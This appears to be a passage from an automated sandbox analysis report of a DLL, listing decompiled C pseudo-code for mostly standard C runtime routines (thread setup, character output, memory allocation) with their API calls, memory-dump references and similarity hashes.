                                                • Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
                                                • Part of subcall function 100021F0: CoTaskMemAlloc.OLE32(?), ref: 10002227
                                                • Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
                                                • Part of subcall function 100021F0: StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
                                                • Part of subcall function 100021F0: CoTaskMemFree.OLE32(00000000), ref: 1000227A
                                              • PropVariantClear.OLE32(?), ref: 10002B59
                                              • VariantClear.OLEAUT32(?), ref: 10002B63
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Variant$ClearString$BinaryCryptPropTask$AllocDeserializeFreeFromProperty
                                              • String ID: EncodedValue$Key$Recipe/ExtendedProperties/Property
                                              • API String ID: 3673094071-3396277477
                                              • Opcode ID: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
                                              • Instruction ID: 3dad86e6d28e45b22825a59d90f277ab18ae42466b94d84f5f8411af20a881c7
                                              • Opcode Fuzzy Hash: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
                                              • Instruction Fuzzy Hash: 1D510A71D0061A9FDB11DFE4C884ADEB7B9EF8D350B118259E905EB214EB35AD42CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 100061BA, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 91%
                                              			E100061BA(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E1000750E(_t3);
				if(E100092DA() != 0) {
					_t6 = E10007E6B(_t5, E10005F1A);
					 *0x10012310 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E10007F1D(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E10006230();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E10007E95(_t9,  *0x10012310, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E1000610E(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E10006230();
					return 0;
				}
			}








                                              0x100061ba
                                              0x100061c6
                                              0x100061d5
                                              0x100061db
                                              0x100061e0
                                              0x100061e3
                                              0x00000000
                                              0x100061e5
                                              0x100061f2
                                              0x100061f6
                                              0x100061f8
                                              0x10006227
                                              0x10006227
                                              0x1000622c
                                              0x1000622f
                                              0x100061fa
                                              0x10006208
                                              0x1000620a
                                              0x00000000
                                              0x1000620c
                                              0x1000620c
                                              0x1000620e
                                              0x1000620f
                                              0x10006216
                                              0x1000621c
                                              0x10006220
                                              0x10006224
                                              0x10006226
                                              0x10006226
                                              0x1000620a
                                              0x100061f8
                                              0x100061c8
                                              0x100061c8
                                              0x100061c8
                                              0x100061cf
                                              0x100061cf

                                              APIs
                                              • __init_pointers.LIBCMT ref: 100061BA
                                                • Part of subcall function 1000750E: EncodePointer.KERNEL32(00000000,00000001,100061BF,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10007511
                                                • Part of subcall function 1000750E: __initp_misc_winsig.LIBCMT ref: 10007532
                                              • __mtinitlocks.LIBCMT ref: 100061BF
                                                • Part of subcall function 100092DA: InitializeCriticalSectionAndSpinCount.KERNEL32(10012AF0,00000FA0,?,00000001,100061C4,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100092F8
                                              • __mtterm.LIBCMT ref: 100061C8
                                                • Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(?,?,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100091F6
                                                • Part of subcall function 10006230: _free.LIBCMT ref: 100091FD
                                                • Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(10012AF0,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001), ref: 1000921F
                                              • __calloc_crt.LIBCMT ref: 100061ED
                                              • __initptd.LIBCMT ref: 1000620F
                                              • GetCurrentThreadId.KERNEL32(10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10006216
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: CriticalSection$Delete$CountCurrentEncodeInitializePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                              • String ID:
                                              • API String ID: 757573777-0
                                              • Opcode ID: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
                                              • Instruction ID: e938656deda60742f1fefc21b0672a3c59c014a575f1141aa0bdfd656c9da876
                                              • Opcode Fuzzy Hash: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
                                              • Instruction Fuzzy Hash: 3CF0BB76519B2229F654E7347C0369A3AC5DF097F1F300A26F464D50DDEF14E4518150
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 1000C468, Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 88%
                                              			E1000C468(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t50;
				signed int _t53;
				signed int _t54;
				signed int _t59;
				void* _t64;
				signed int _t66;
				void* _t68;
				signed int _t75;
				signed int _t79;
				signed short _t80;
				signed int _t82;
				void* _t83;
				signed int _t90;
				void* _t91;
				signed int _t92;
				signed int _t94;
				signed int* _t97;

				_t46 = E100076DE(_t45);
				if(_t46 >= 0) {
					_t97 = _a8;
					_t47 = E100095F8(_t97);
					_t79 = _t97[3];
					_t94 = _t47;
					__eflags = _t79 & 0x00000082;
					if((_t79 & 0x00000082) != 0) {
						__eflags = _t79 & 0x00000040;
						if((_t79 & 0x00000040) == 0) {
							_t75 = 0;
							__eflags = _t79 & 0x00000001;
							if((_t79 & 0x00000001) == 0) {
								L10:
								_t50 = _t97[3] & 0xffffffef | 0x00000002;
								_t97[3] = _t50;
								_t97[1] = _t75;
								__eflags = _t50 & 0x0000010c;
								if((_t50 & 0x0000010c) == 0) {
									_t64 = E1000951C();
									__eflags = _t97 - _t64 + 0x20;
									if(_t97 == _t64 + 0x20) {
										L13:
										_t66 = E1000961C(_t94);
										__eflags = _t66;
										if(_t66 == 0) {
											goto L14;
										}
									} else {
										_t68 = E1000951C();
										__eflags = _t97 - _t68 + 0x40;
										if(_t97 != _t68 + 0x40) {
											L14:
											E1000A133(_t97);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t97[3] & 0x00000108;
								if(__eflags == 0) {
									_v12 = _a4;
									_push(2);
									_push( &_v12);
									_push(_t94);
									_v8 = 2;
									_t53 = E10009680(_t75, _t91, _t94, _t97, __eflags);
									_t80 = _a4;
									_t75 = _t53;
									goto L27;
								} else {
									_t92 = _t97[2];
									 *_t97 = _t92 + 2;
									_t82 =  *_t97 - _t92;
									_v8 = _t82;
									_t97[1] = _t97[6] - 2;
									__eflags = _t82;
									if(__eflags <= 0) {
										__eflags = _t94 - 0xffffffff;
										if(_t94 == 0xffffffff) {
											L22:
											_t83 = 0x10012340;
										} else {
											__eflags = _t94 - 0xfffffffe;
											if(_t94 == 0xfffffffe) {
												goto L22;
											} else {
												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t94 >> 5) * 4));
											}
										}
										__eflags =  *(_t83 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t75);
											_push(_t75);
											_push(_t94);
											_t59 = E10009FB9(_t75, _t94, _t97, __eflags);
											__eflags = (_t59 & _t92) - 0xffffffff;
											if((_t59 & _t92) == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t82);
										_push(_t92);
										_push(_t94);
										_t75 = E10009680(_t75, _t92, _t94, _t97, __eflags);
										L25:
										_t80 = _a4;
										 *(_t97[2]) = _t80;
										L27:
										__eflags = _t75 - _v8;
										if(_t75 == _v8) {
											_t54 = _t80 & 0x0000ffff;
										} else {
											L28:
											_t43 =  &(_t97[3]);
											 *_t43 = _t97[3] | 0x00000020;
											__eflags =  *_t43;
											goto L29;
										}
									}
								}
							} else {
								_t97[1] = 0;
								__eflags = _t79 & 0x00000010;
								if((_t79 & 0x00000010) == 0) {
									_t97[3] = _t79 | 0x00000020;
									L29:
									_t54 = 0xffff;
								} else {
									_t90 = _t79 & 0xfffffffe;
									__eflags = _t90;
									 *_t97 = _t97[2];
									_t97[3] = _t90;
									goto L10;
								}
							}
						} else {
							 *((intOrPtr*)(E10005EC6())) = 0x22;
							goto L6;
						}
					} else {
						 *((intOrPtr*)(E10005EC6())) = 9;
						L6:
						_t97[3] = _t97[3] | 0x00000020;
						_t54 = 0xffff;
					}
					return _t54;
				} else {
					return _t46 | 0xffffffff;
				}
			}





























                                              0x1000c46d
                                              0x1000c474
                                              0x1000c47c
                                              0x1000c481
                                              0x1000c487
                                              0x1000c48a
                                              0x1000c48c
                                              0x1000c48f
                                              0x1000c49e
                                              0x1000c4a1
                                              0x1000c4bd
                                              0x1000c4bf
                                              0x1000c4c2
                                              0x1000c4d7
                                              0x1000c4dd
                                              0x1000c4e0
                                              0x1000c4e3
                                              0x1000c4e6
                                              0x1000c4eb
                                              0x1000c4ed
                                              0x1000c4f5
                                              0x1000c4f7
                                              0x1000c505
                                              0x1000c506
                                              0x1000c50c
                                              0x1000c50e
                                              0x00000000
                                              0x00000000
                                              0x1000c4f9
                                              0x1000c4f9
                                              0x1000c501
                                              0x1000c503
                                              0x1000c510
                                              0x1000c511
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x1000c503
                                              0x1000c4f7
                                              0x1000c517
                                              0x1000c51e
                                              0x1000c5a0
                                              0x1000c5a4
                                              0x1000c5a9
                                              0x1000c5aa
                                              0x1000c5ab
                                              0x1000c5b2
                                              0x1000c5b7
                                              0x1000c5bd
                                              0x00000000
                                              0x1000c520
                                              0x1000c520
                                              0x1000c528
                                              0x1000c52d
                                              0x1000c532
                                              0x1000c535
                                              0x1000c538
                                              0x1000c53a
                                              0x1000c553
                                              0x1000c556
                                              0x1000c573
                                              0x1000c573
                                              0x1000c558
                                              0x1000c558
                                              0x1000c55b
                                              0x00000000
                                              0x1000c55d
                                              0x1000c56a
                                              0x1000c56a
                                              0x1000c55b
                                              0x1000c578
                                              0x1000c57c
                                              0x00000000
                                              0x1000c57e
                                              0x1000c57e
                                              0x1000c580
                                              0x1000c581
                                              0x1000c582
                                              0x1000c583
                                              0x1000c58d
                                              0x1000c590
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x1000c590
                                              0x1000c53c
                                              0x1000c53c
                                              0x1000c53d
                                              0x1000c53e
                                              0x1000c547
                                              0x1000c592
                                              0x1000c595
                                              0x1000c598
                                              0x1000c5bf
                                              0x1000c5bf
                                              0x1000c5c2
                                              0x1000c5cf
                                              0x1000c5c4
                                              0x1000c5c4
                                              0x1000c5c4
                                              0x1000c5c4
                                              0x1000c5c4
                                              0x00000000
                                              0x1000c5c4
                                              0x1000c5c2
                                              0x1000c53a
                                              0x1000c4c4
                                              0x1000c4c4
                                              0x1000c4c7
                                              0x1000c4ca
                                              0x1000c54e
                                              0x1000c5c8
                                              0x1000c5c8
                                              0x1000c4cc
                                              0x1000c4cf
                                              0x1000c4cf
                                              0x1000c4d2
                                              0x1000c4d4
                                              0x00000000
                                              0x1000c4d4
                                              0x1000c4ca
                                              0x1000c4a3
                                              0x1000c4a8
                                              0x00000000
                                              0x1000c4a8
                                              0x1000c491
                                              0x1000c496
                                              0x1000c4ae
                                              0x1000c4ae
                                              0x1000c4b2
                                              0x1000c4b2
                                              0x1000c5d6
                                              0x1000c476
                                              0x1000c47a
                                              0x1000c47a

                                              APIs
                                              • __ioinit.LIBCMT ref: 1000C46D
                                                • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Once$ExecuteInit__ioinit
                                              • String ID:
                                              • API String ID: 129814473-0
                                              • Opcode ID: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
                                              • Instruction ID: 4d06972f43a844bfa3949195b83d417bb95582cf177f034ad1b947d460bfdcb6
                                              • Opcode Fuzzy Hash: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
                                              • Instruction Fuzzy Hash: B641E175500B099BF724CB68CC91E6A77E4EF453E1F10861DE8A6876D9E774FD808B10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10005033, Relevance: 9.1, APIs: 6, Instructions: 134COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 89%
                                              			E10005033(void* __eflags, signed char _a4, intOrPtr* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr* _t92;

				_t44 = E100076DE(_t43);
				if(_t44 >= 0) {
					_t92 = _a8;
					_t45 = E100095F8(_t92);
					_t2 = _t92 + 0xc; // 0x66ce7cf0
					_t74 =  *_t2;
					_t89 = _t45;
					__eflags = _t74 & 0x00000082;
					if((_t74 & 0x00000082) != 0) {
						__eflags = _t74 & 0x00000040;
						if((_t74 & 0x00000040) == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t16 = _t92 + 0xc; // 0x66ce7cf0
								_t48 =  *_t16 & 0xffffffef | 0x00000002;
								 *(_t92 + 0xc) = _t48;
								 *(_t92 + 4) = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E1000951C();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E1000961C(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E1000951C();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E1000A133(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags =  *(_t92 + 0xc) & 0x00000108;
								if(( *(_t92 + 0xc) & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E10009680(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t24 = _t92 + 8; // 0x753b46c6
									_t87 =  *_t24;
									_t25 = _t87 + 1; // 0x753b46c7
									 *_t92 = _t25;
									_t26 = _t92 + 0x18; // 0x8b0d78fe
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									 *(_t92 + 4) =  *_t26 - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0x10012340;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E10009FB9(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E10009680(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t35 = _t92 + 8; // 0x753b46c6
										_t45 = _a4;
										 *( *_t35) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 = _t92 + 0xc;
											 *_t40 =  *(_t92 + 0xc) | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								 *(_t92 + 4) = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									 *(_t92 + 0xc) = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t14 = _t92 + 8; // 0x753b46c6
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 =  *_t14;
									 *(_t92 + 0xc) = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E10005EC6();
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E10005EC6();
						 *_t67 = 9;
						L6:
						 *(_t92 + 0xc) =  *(_t92 + 0xc) | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}


























                                              0x10005037
                                              0x1000503e
                                              0x10005046
                                              0x1000504b
                                              0x10005051
                                              0x10005051
                                              0x10005054
                                              0x10005056
                                              0x10005059
                                              0x10005068
                                              0x1000506b
                                              0x10005085
                                              0x10005087
                                              0x1000508a
                                              0x1000509f
                                              0x1000509f
                                              0x100050a5
                                              0x100050a8
                                              0x100050ab
                                              0x100050ae
                                              0x100050b3
                                              0x100050b5
                                              0x100050bd
                                              0x100050bf
                                              0x100050cd
                                              0x100050ce
                                              0x100050d4
                                              0x100050d6
                                              0x00000000
                                              0x00000000
                                              0x100050c1
                                              0x100050c1
                                              0x100050c9
                                              0x100050cb
                                              0x100050d8
                                              0x100050d9
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x100050cb
                                              0x100050bf
                                              0x100050df
                                              0x100050e6
                                              0x10005164
                                              0x10005165
                                              0x10005166
                                              0x1000516c
                                              0x1000516d
                                              0x1000516e
                                              0x10005176
                                              0x00000000
                                              0x100050e8
                                              0x100050e8
                                              0x100050e8
                                              0x100050ed
                                              0x100050f0
                                              0x100050f2
                                              0x100050f5
                                              0x100050f8
                                              0x100050fb
                                              0x100050fe
                                              0x10005100
                                              0x10005119
                                              0x1000511c
                                              0x10005139
                                              0x10005139
                                              0x1000511e
                                              0x1000511e
                                              0x10005121
                                              0x00000000
                                              0x10005123
                                              0x10005130
                                              0x10005130
                                              0x10005121
                                              0x1000513e
                                              0x10005142
                                              0x00000000
                                              0x10005144
                                              0x10005144
                                              0x10005146
                                              0x10005147
                                              0x10005148
                                              0x1000514e
                                              0x10005153
                                              0x10005156
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x10005156
                                              0x10005102
                                              0x10005102
                                              0x10005103
                                              0x10005104
                                              0x1000510d
                                              0x10005158
                                              0x10005158
                                              0x1000515b
                                              0x1000515e
                                              0x10005178
                                              0x10005178
                                              0x1000517b
                                              0x10005186
                                              0x1000517d
                                              0x1000517d
                                              0x1000517d
                                              0x1000517d
                                              0x1000517d
                                              0x00000000
                                              0x1000517d
                                              0x1000517b
                                              0x10005100
                                              0x1000508c
                                              0x1000508c
                                              0x1000508f
                                              0x10005092
                                              0x10005114
                                              0x10005181
                                              0x10005181
                                              0x10005094
                                              0x10005094
                                              0x10005097
                                              0x10005097
                                              0x1000509a
                                              0x1000509c
                                              0x00000000
                                              0x1000509c
                                              0x10005092
                                              0x1000506d
                                              0x1000506d
                                              0x10005072
                                              0x00000000
                                              0x10005072
                                              0x1000505b
                                              0x1000505b
                                              0x10005060
                                              0x10005078
                                              0x10005078
                                              0x1000507c
                                              0x1000507c
                                              0x1000518e
                                              0x10005040
                                              0x10005044
                                              0x10005044

                                              APIs
                                              • __ioinit.LIBCMT ref: 10005037
                                                • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Once$ExecuteInit__ioinit
                                              • String ID:
                                              • API String ID: 129814473-0
                                              • Opcode ID: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
                                              • Instruction ID: 32086827ce60b9a2cbb99d25a0e80922b058c4e771a23cab2cd98d30bef894a1
                                              • Opcode Fuzzy Hash: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
                                              • Instruction Fuzzy Hash: 4A41F171900B059FF324CF68C851BAB77E4DF453E2B10871DE8B6C62D9E676E9408B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10004A66, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 90%
                                              			E10004A66(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char* _v16;
				char _v28;
				signed char _v32;
				void* _t10;
				void* _t19;
				intOrPtr* _t22;
				void* _t24;
				void* _t25;
				intOrPtr* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t19 = __ebx;
				while(1) {
					_t10 = E10008E67(_t19, _t24, _t25, _a4);
					if(_t10 != 0) {
						break;
					}
					if(E10009026(_t10, _a4) == 0) {
						_push(1);
						_t22 =  &_v28;
						_v16 = "bad allocation";
						E10008F1E(_t22,  &_v16);
						_v28 = 0x1000e460;
						E10009059( &_v28, 0x10010b04);
						asm("int3");
						_t27 = _t22;
						 *_t27 = 0x1000e460;
						E10008F5C(_t22);
						if((_v32 & 0x00000001) != 0) {
							L10003800(_t27);
						}
						return _t27;
					} else {
						continue;
					}
					L7:
				}
				return _t10;
				goto L7;
			}












                                              0x10004a66
                                              0x10004a66
                                              0x10004a66
                                              0x10004a7b
                                              0x10004a7e
                                              0x10004a86
                                              0x00000000
                                              0x00000000
                                              0x10004a79
                                              0x10004a8a
                                              0x10004a90
                                              0x10004a93
                                              0x10004a9a
                                              0x10004aa8
                                              0x10004aaf
                                              0x10004ab4
                                              0x10004ab9
                                              0x10004abb
                                              0x10004ac1
                                              0x10004aca
                                              0x10004acd
                                              0x10004ad2
                                              0x10004ad7
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x10004a79
                                              0x10004a89
                                              0x00000000

                                              APIs
                                              • _malloc.LIBCMT ref: 10004A7E
                                                • Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
                                                • Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
                                                • Part of subcall function 10008E67: HeapAlloc.KERNEL32(00480000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA
                                              • std::exception::exception.LIBCMT ref: 10004A9A
                                              • __CxxThrowException@8.LIBCMT ref: 10004AAF
                                                • Part of subcall function 10009059: RaiseException.KERNEL32(?,?,?,10010B04,?,?,?,10004AB4,?,10010B04,00000000,00000001), ref: 100090AA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                              • String ID: `$h
                                              • API String ID: 1059622496-773005782
                                              • Opcode ID: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
                                              • Instruction ID: ad3e8221741d280e2df0066782729e531edcb1fd3c4a4238d597797a5e5b62a6
                                              • Opcode Fuzzy Hash: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
                                              • Instruction Fuzzy Hash: C2F028B550024D6AFB00DBA8DC01ADF77ACEF023C4F114426F900A2149CFB1AA4087AA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 1000B39B, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 95%
                                              			E1000B39B(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x100132fc, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x10013c2c == _t7) {
									_t9 = E10005EC6();
									 *_t9 = E10005ED9(GetLastError());
									goto L17;
								} else {
									if(E10009026(_t7, _t31) == 0) {
										_t12 = E10005EC6();
										 *_t12 = E10005ED9(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E10009026(_t6, _t31);
						 *((intOrPtr*)(E10005EC6())) = 0xc;
						goto L12;
					} else {
						E10004732(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E10008E67(__ebx, __edx, __edi, _a8);
				}
			}









                                              0x1000b3a2
                                              0x1000b3b0
                                              0x1000b3b5
                                              0x1000b3c4
                                              0x1000b3f7
                                              0x1000b3c9
                                              0x1000b3cb
                                              0x1000b3cb
                                              0x1000b3d8
                                              0x1000b3de
                                              0x1000b3e2
                                              0x1000b442
                                              0x1000b442
                                              0x1000b3e4
                                              0x1000b3ea
                                              0x1000b42c
                                              0x1000b440
                                              0x00000000
                                              0x1000b3ec
                                              0x1000b3f5
                                              0x1000b414
                                              0x1000b428
                                              0x1000b40e
                                              0x1000b40e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x1000b3f5
                                              0x1000b3ea
                                              0x00000000
                                              0x1000b410
                                              0x1000b3fd
                                              0x1000b408
                                              0x00000000
                                              0x1000b3b7
                                              0x1000b3ba
                                              0x1000b3c0
                                              0x1000b3c0
                                              0x1000b411
                                              0x1000b413
                                              0x1000b3a4
                                              0x1000b3ae
                                              0x1000b3ae

                                              APIs
                                              • _malloc.LIBCMT ref: 1000B3A7
                                                • Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
                                                • Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
                                                • Part of subcall function 10008E67: HeapAlloc.KERNEL32(00480000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA
                                              • _free.LIBCMT ref: 1000B3BA
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
